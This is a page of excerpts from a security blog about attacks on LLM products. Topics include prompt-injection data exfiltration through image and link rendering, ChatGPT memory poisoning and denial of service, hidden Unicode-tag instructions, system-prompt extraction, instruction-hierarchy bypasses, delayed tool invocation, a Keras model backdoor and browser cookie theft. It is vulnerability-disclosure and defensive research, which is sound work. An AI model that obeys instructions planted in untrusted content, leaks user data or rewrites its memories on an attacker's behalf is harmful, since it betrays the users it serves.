Embrace The Red

Google Colab AI: Data Leakage Through Image Rendering Fixed. Some Risks Remain.

1 year 8 months ago

Google Colab AI, now just called Gemini in Colab, was vulnerable to data leakage via image rendering.

This is an older bug report, dating back to November 29, 2023. However, recent events prompted me to write this up:

Google did not reward this finding, and
Colab now automatically puts Notebook content (untrusted data) into the prompt.

Let’s explore the specifics.

Google Colab AI - Revealing the System Prompt

At the end of November last year, I noticed that there was a “Colab AI” feature, which integrated an LLM to chat with and write code. Naturally, I grabbed the system prompt, and it contained instructions that begged the LLM to not render images.

Breaking Instruction Hierarchy in OpenAI's gpt-4o-mini

Embrace The Red

1 year 8 months ago

Recently, OpenAI announced gpt-4o-mini and there are some interesting updates, including safety improvements regarding “Instruction Hierarchy”:

OpenAI frames this as “safety”; the word “security” is not mentioned in the announcement.

Additionally, an article in The Verge titled “OpenAI’s latest model will block the ‘ignore all previous instructions’ loophole” created interesting discussions on X, including a first demo bypass.

I spent some time this weekend building a better intuition for the gpt-4o-mini model and instruction hierarchy, and the conclusion is that system instructions are still not a security boundary.

Sorry, ChatGPT Is Under Maintenance: Persistent Denial of Service through Prompt Injection and Memory Attacks

Embrace The Red

1 year 8 months ago

Imagine you visit a website with ChatGPT, and suddenly, it stops working entirely!

In this post we show how an attacker can use prompt injection to cause a persistent denial of service that lasts across chat sessions for a user.

Hacking Memories

Previously we discussed how ChatGPT is vulnerable to automatic tool invocation of the memory tool. This can be used by an attacker during prompt injection to ingest malicious or fake memories into your ChatGPT.

GitHub Copilot Chat: From Prompt Injection to Data Exfiltration

Embrace The Red

1 year 9 months ago

This post highlights how the GitHub Copilot Chat VS Code Extension was vulnerable to data exfiltration via prompt injection when analyzing untrusted source code.

GitHub Copilot Chat

GitHub Copilot Chat is a VS Code Extension that allows a user to chat with source code, refactor code, get info about terminal output, or general help about VS Code, and things along those lines.

It does so by sending source code, along with the user’s questions, to a large language model (LLM). A bit of a segue, but if you are curious, here are its system instructions, highlighting some interesting prompting strategies and that it is powered by GPT-4:

Automatic Tool Invocation when Browsing with ChatGPT - Threats and Mitigations

Embrace The Red

1 year 10 months ago

In the previous post we demonstrated how instructions embedded in untrusted data can invoke ChatGPT’s memory tool. The examples we looked at included Uploaded Files, Connected Apps and also the Browsing tool.

When it came to the browsing tool we observed that mitigations were put in place and older demo exploits did not work anymore. After chatting with other security researchers, I learned that they had observed the same.

ChatGPT: Hacking Memories with Prompt Injection

Embrace The Red

1 year 10 months ago

OpenAI recently introduced a memory feature in ChatGPT, enabling it to recall information across sessions, creating a more personalized user experience.

However, with this new capability come risks. Imagine if an attacker could manipulate your AI assistant (chatbot or agent) to remember false information, bias or even instructions, or delete all your memories! This is not a futuristic scenario; the attack that makes this possible is called Indirect Prompt Injection.

Machine Learning Attack Series: Backdooring Keras Models and How to Detect It

Embrace The Red

1 year 10 months ago

This post is part of a series about machine learning and artificial intelligence.

Adversaries often leverage supply chain attacks to gain footholds. In machine learning, model deserialization issues are a significant threat, and detecting them is crucial, as they can lead to arbitrary code execution. We explored this attack with Python Pickle files in the past.

In this post we are covering backdooring the original Keras Husky AI model from the Machine Learning Attack Series, and afterwards we investigate tooling to detect the backdoor.
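To make the deserialization risk concrete, here is a minimal sketch for the Python Pickle case mentioned above. It is not the detection tooling from the post, and it does not inspect Keras model files; it only walks a pickle byte stream with the standard library's `pickletools` and flags opcodes that can import or call objects during loading. The function name `find_suspicious_opcodes` and the opcode set are assumptions chosen for illustration.

```python
import pickle
import pickletools

# Opcodes that can import a callable or invoke it while unpickling.
# This set is an illustrative assumption, not an exhaustive policy.
SUSPICIOUS_OPCODES = {
    "GLOBAL", "STACK_GLOBAL", "REDUCE", "INST", "OBJ", "NEWOBJ", "NEWOBJ_EX",
}


def find_suspicious_opcodes(data: bytes) -> list[tuple[int, str, object]]:
    """Return (position, opcode name, argument) for each flagged opcode.

    The stream is only parsed, never loaded, so nothing in it is executed.
    """
    findings = []
    for opcode, arg, pos in pickletools.genops(data):
        if opcode.name in SUSPICIOUS_OPCODES:
            findings.append((pos, opcode.name, arg))
    return findings


if __name__ == "__main__":
    class Demo:
        # Hypothetical payload: unpickling would call print("hello").
        def __reduce__(self):
            return (print, ("hello",))

    for finding in find_suspicious_opcodes(pickle.dumps(Demo())):
        print(finding)
```

A plain dictionary of numbers produces no findings, while any object that pickles through `__reduce__` does. Legitimate pickles also use these opcodes, so a hit is a reason to look closer, not proof of a backdoor.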

Pivot to the Clouds: Cookie Theft in 2024

Embrace The Red

1 year 10 months ago

Recently Google published a blog about detecting browser data theft using Windows Event Logs.

There are some good points in the post for defenders on how to detect misuse of DPAPI calls attempting to grab sensitive browser data.

But, what about the Remote Debugging feature?

This made me curious to revisit the state of the remote debugging feature of browsers for grabbing sensitive information, including cookies.

We discussed cookie theft techniques in the past, even presented about it at the CCC some 5+ years ago and helped add the TTP to the MITRE ATT&CK matrix.

Bobby Tables but with LLM Apps - Google NotebookLM Data Exfiltration

Embrace The Red

1 year 11 months ago

Google’s NotebookLM is an experimental project that was released last year. It allows users to upload files and analyze them with a large language model (LLM).

However, it is vulnerable to Prompt Injection, meaning that uploaded files can manipulate the chat conversation and control what the user sees in responses.

There is currently no known solution to these kinds of attacks, so users can’t implicitly trust responses from large language model applications when untrusted data is involved. Additionally, NotebookLM is vulnerable to data exfiltration when processing untrusted data.

HackSpaceCon 2024: Short Trip Report, Slides and Rocket Launch

Embrace The Red

1 year 11 months ago

This week was HackSpaceCon 2024. It was the first time I attended and it was fantastic.

The conference was at the Kennedy Space Center! Yes, right there, and the swag and talks matched the world-class location.

The keynote “Buckle up! Let’s make the world a safer place” was by Dave Kennedy, who provided great insights on attacker strategies of the past and present, the importance of active threat hunting and challenges ahead. A great specific example he gave was how simple modifications to off-the-shelf malware (still) go entirely under the radar.

Google AI Studio Data Exfiltration via Prompt Injection - Possible Regression and Fix

Embrace The Red

1 year 11 months ago

What I like about the rapid advancements and excitement about AI over the last few years is that we see a resurgence of the testing discipline!

Software testing is hard, and adding AI to the mix does not make it easier at all!

Google AI Studio - Initially not vulnerable to data leakage via image rendering

When Google released AI Studio last year I checked for the common image markdown data exfiltration vulnerability and it was not vulnerable.

The dangers of AI agents unfurling hyperlinks and what to do about it

Embrace The Red

1 year 11 months ago

About a year ago we talked about why developers can’t intrinsically trust LLM responses, the common threats that AI chatbots face, and how attackers can exploit them, including ways to exfiltrate data.

One of the threats is unfurling of hyperlinks, which can lead to data exfiltration and is something often seen in Chatbots. So, let’s shine more light on it, including practical guidance on how to mitigate it with the example of Slack Apps.
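As a rough illustration of the Slack case, the sketch below builds a message payload with link and media unfurling turned off. `unfurl_links` and `unfurl_media` are parameters of Slack's `chat.postMessage` Web API method; the helper name `build_slack_message` and the channel ID are hypothetical, and the payload is only constructed here, not sent.

```python
import json


def build_slack_message(channel: str, text: str) -> dict:
    """Build a chat.postMessage payload that asks Slack not to unfurl.

    With unfurling disabled, Slack should not fetch URLs in the message to
    build previews, so a URL planted by a prompt injection is not requested
    automatically when the bot posts it.
    """
    return {
        "channel": channel,
        "text": text,
        "unfurl_links": False,  # no previews for text-based links
        "unfurl_media": False,  # no previews for media links
    }


if __name__ == "__main__":
    # "C0123456789" is a placeholder channel ID.
    payload = build_slack_message("C0123456789", "See https://example.com/report")
    print(json.dumps(payload, indent=2))
```

This only covers automatic fetching at post time. A user can still click a malicious link, so it complements rather than replaces validation of what the LLM outputs.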

ASCII Smuggler - Improvements

Embrace The Red

2 years ago

I added a couple of features and improvements to ASCII Smuggler, including:

Optional rendering of the BEGIN and END Unicode Tags when crafting hidden text
Added a feature to URL decode the input before checking for hidden text
Output Modes for Decoding: Switch between highlighting the hidden text amongst the regular content, or only showing the hidden text in the output
The selected options are remembered now (using local storage)
Updated the UI to make it look nicer (e.g., bigger fonts), and it works better on mobile now

The tool is here.

Who Am I? Conditional Prompt Injection Attacks with Microsoft Copilot

Embrace The Red

2 years ago

Building reliable prompt injection payloads is challenging at times. It’s this new world with large language model (LLM) applications that can be instructed with natural language and they mostly follow instructions… but not always.

Attackers have the same challenges around prompt engineering as normal users.

Prompt Injection Exploit Development

Attacks always get better over time. And as more features are being added to LLM applications, the degrees of freedom for attackers increase as well.

Google Gemini: Planting Instructions For Delayed Automatic Tool Invocation

Embrace The Red

2 years 1 month ago

Last November, while testing Google Bard (now called Gemini) for vulnerabilities, I had a couple of interesting observations when it comes to automatic tool invocation.

Confused Deputy - Automatic Tool Invocation

First, what do I mean by this… “automatic tool invocation”…

Consider the following scenario: An attacker sends a malicious email to a user containing instructions to call an external tool. Google named these tools Extensions.

When the user analyzes the email with an LLM, it interprets the instructions and calls the external tool, leading to a kind of request forgery or maybe better called automatic tool invocation.

ChatGPT: Lack of Isolation between Code Interpreter sessions of GPTs

Embrace The Red

2 years 1 month ago

Your Code Interpreter sandbox, also known as an Advanced Data Analysis session, is shared between private and public GPTs. Yes, your actual compute container and its storage are shared. Each user gets their own isolated container, but if a user uses multiple GPTs and stores files in Code Interpreter, all GPTs can access (and also overwrite) each other’s files.

This is true also for files uploaded/created with private GPTs and ChatGPT itself.

Video: ASCII Smuggling and Hidden Prompt Instructions

Embrace The Red

2 years 1 month ago

A couple of weeks ago hidden prompt injections were discovered and we covered it at the time.

This video explains it in more detail, and also highlights implications beyond hiding instructions, including what I call ASCII Smuggling. This is the usage of Unicode Tags Block characters to both craft and decipher hidden messages in plain sight.
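The mechanics can be sketched in a few lines. The Unicode Tags block spans U+E0000 to U+E007F and mirrors ASCII, so an ASCII character maps to an invisible counterpart by adding 0xE0000 to its code point. The function names below are illustrative and are not taken from the ASCII Smuggler tool.

```python
TAG_BASE = 0xE0000  # start of the Unicode Tags block
TAG_END = 0xE007F   # end of the Unicode Tags block


def encode_tags(text: str) -> str:
    """Map each ASCII character to its invisible Tags block counterpart."""
    if not text.isascii():
        raise ValueError("only ASCII text can be mapped into the Tags block")
    return "".join(chr(TAG_BASE + ord(c)) for c in text)


def decode_tags(text: str) -> str:
    """Recover hidden ASCII text from any Tags block characters present."""
    return "".join(
        chr(ord(c) - TAG_BASE) for c in text if TAG_BASE <= ord(c) <= TAG_END
    )


def strip_tags(text: str) -> str:
    """Drop all Tags block characters, keeping only the visible text."""
    return "".join(c for c in text if not TAG_BASE <= ord(c) <= TAG_END)


if __name__ == "__main__":
    message = "Hello" + encode_tags("ignore previous instructions")
    print(len(message))          # longer than the 5 visible characters
    print(decode_tags(message))  # the hidden text
    print(strip_tags(message))   # the visible text only
```

A check like `decode_tags` can reveal hidden text in untrusted input, and `strip_tags` is one way to remove it before the text reaches a model.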

Hidden Prompt Injections with Anthropic Claude

Embrace The Red

2 years 1 month ago

A few weeks ago while waiting at the airport lounge I was wondering how other Chatbots, besides ChatGPT, handle hidden Unicode Tags code points.

A quick reminder: Unicode Tags code points are invisible in UI elements, but ChatGPT was able to interpret them and follow hidden instructions. Riley Goodside discovered it.

What about Anthropic Claude?

While waiting for a flight I decided to look at Anthropic Claude. Turns out it has the same issue as ChatGPT had. I reported it behind the scenes, but got the following final reply and the ticket was closed.

Exploring Google Bard's Data Visualization Feature (Code Interpreter)

Embrace The Red

2 years 2 months ago

Last November Google had an interesting update to Google Bard. This update included the ability to solve math equations and draw charts based on data.

What does this mean and why is it interesting?

It means that Google Bard has access to a computer and can run more complex programs, including Python code that plots graphs!

Let’s explore this with a simple example.

Drawing Charts with Google Bard

The following prompt will create a chart:

AWS Fixes Data Exfiltration Attack Angle in Amazon Q for Business

Embrace The Red

2 years 2 months ago

A few weeks ago Amazon released the Preview of Amazon Q for Business, and after looking at it I found a data exfiltration angle via rendering markdown/hyperlinks and reported it to Amazon.

Amazon reacted quickly and mitigated the problem. This post shares further details and how it was fixed.

The Problem

An Indirect Prompt Injection attack can cause the LLM to return markdown tags. This allows an adversary whose data makes it into the chat context (e.g., via an uploaded file) to achieve data exfiltration of the victim’s data by rendering hyperlinks.
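One general way to reduce this risk is to neutralize links and images in model output before rendering. The sketch below is not how Amazon fixed the issue, which this excerpt does not describe. It rewrites inline markdown links and images whose host is not on an allowlist, keeping only the visible label. The allowlist contents, the regular expression, and the function name are all assumptions for illustration.

```python
import re
from urllib.parse import urlparse

# Hypothetical allowlist of hosts the application trusts.
ALLOWED_HOSTS = {"example.com"}

# Inline markdown links and images: [label](url) and ![alt](url).
MD_LINK = re.compile(r"(!?)\[([^\]]*)\]\(\s*([^)\s]+)[^)]*\)")


def neutralize_untrusted_links(markdown: str) -> str:
    """Replace links/images to non-allowlisted hosts with their label text."""

    def replace(match: re.Match) -> str:
        label, url = match.group(2), match.group(3)
        host = urlparse(url).hostname or ""
        if host in ALLOWED_HOSTS:
            return match.group(0)  # trusted host: leave untouched
        return label  # untrusted or relative URL: drop the URL entirely

    return MD_LINK.sub(replace, markdown)


if __name__ == "__main__":
    response = (
        "Summary ![x](https://attacker.test/log?q=SECRET) "
        "and [docs](https://example.com/a)"
    )
    print(neutralize_untrusted_links(response))
```

The sketch handles inline syntax only. Reference-style links, raw HTML, and autolinked bare URLs would need separate handling, and a Content Security Policy on the rendering page is a sturdier control for image loads.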
